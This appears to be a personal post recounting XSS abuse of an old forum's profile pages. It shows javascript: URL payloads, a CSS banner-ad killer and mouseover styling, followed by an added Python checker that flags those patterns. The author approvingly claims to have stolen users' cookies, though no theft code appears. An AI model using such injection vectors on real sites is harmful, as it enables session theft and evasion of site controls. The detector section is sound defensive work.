XSS Magic

So I used to be a part of this community forum before Facebook was around, and everyone had their own profile pages. The problem was they were boring. The code you were allowed to use was heavily restricted, so no Flash or JavaScript was allowed, not even mouseover images!

There were also banner ads at the top of the pages, and you had to pay to have them removed. They interfered with the look of your page when you customized it with CSS.

Well, I wasn’t having any of this. I planned on bypassing every restriction imposed, and I did just that using XSS. I also used XSS to steal cookies of users on the forums and get around other restrictions. Here’s some old code I found that I used on the site successfully.

<!--BANNER KILLER-->
<STYLE type=text/css>
IFRAME {
VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px
}
</STYLE>
<!--BANNER KILLER-->

<!--<hr style=`background:url(javascript:alert('who');alert('said');alert('they');alert('disabled');alert('Javascript :P'))`>-->

<div align="center"><img src="Javascript:void(window.defaultStatus = 'Thanks for Visiting')" width="1" height="1" align="middle">

<IMG SRC="javascript:alert('Welcome to the site!')" width="1" height="1" align="middle">

CSS
Code:

.MouseOvr {
  width: 75px;
  height: 32px;
  background: url("");
  display: block;
}
.MouseOvr :link,
.MouseOvr :visited {
  width: 75px;
  height: 32px;
  background: url("");
  display: block;
}
.MouseOvr a:hover {
  width: 75px;
  height: 32px;
  background: url("http://www.google.ca/intl/en_ca/images/logo.gif");
  display: block;
}
.MouseOvr a:hover span {
  visibility: hidden;
}

HTML: Add this anywhere in your page you want the link
Code:

<h1 class="MouseOvr">
<a href="http://google.ca">
<span>Link</span>
</a>
</h1>
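
A check a forum operator could run over submitted profile markup to flag the patterns in the snippets earlier in this post: javascript: URLs in attributes or inside comments, and style rules that hide IFRAME elements. This is an added example, not code from the original post; ProfileAuditor, audit, has_js_scheme and the sample input are hypothetical names and constructed data.

```python
import re
from html.parser import HTMLParser

_WS = re.compile(r"\s+")
_HIDES = re.compile(r"visibility:hidden|display:none|(?:width|height):0(?:px)?(?:;|$)")

def has_js_scheme(value):
    return "javascript:" in _WS.sub("", value).lower()  # ignore case and whitespace

class ProfileAuditor(HTMLParser):
    """Collects (kind, where) findings from user-supplied profile markup."""
    def __init__(self):
        super().__init__()
        self.findings, self._css = [], None

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._css = []  # buffer the style block until </style>
        for name, value in attrs:  # src=, href=, style=, ...
            if value and has_js_scheme(value):
                self.findings.append(("js-url", f"<{tag} {name}>"))

    def handle_data(self, data):
        if self._css is not None:
            self._css.append(data)

    def handle_comment(self, data):
        if has_js_scheme(data):  # markup parked inside <!-- -->
            self.findings.append(("js-url", "comment"))

    def handle_endtag(self, tag):
        if tag == "style" and self._css is not None:
            css, self._css = "".join(self._css).lower(), None
            for selector, body in re.findall(r"([^{}]+)\{([^{}]*)\}", css):
                hidden = _HIDES.search(_WS.sub("", body))
                if hidden and re.search(r"\biframe\b", selector):
                    self.findings.append(("hidden-iframe", selector.strip()))

def audit(markup):
    auditor = ProfileAuditor()
    auditor.feed(markup)
    auditor.close()
    return auditor.findings

# Constructed sample modelled on the snippets above (straight quotes).
SAMPLE = """<style>IFRAME { VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px }
.MouseOvr a:hover span { visibility: hidden; }</style>
<!--<hr style="background:url(javascript:alert('who'))">-->
<img src="Javascript:void(0)" width="1" height="1">
<a href="http://google.ca"><span>Link</span></a>"""
```

Flagging like this suits review and triage of submitted pages. For markup that will actually be rendered, an allow-list sanitizer that drops unknown tags, attributes and URL schemes is the stronger control.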
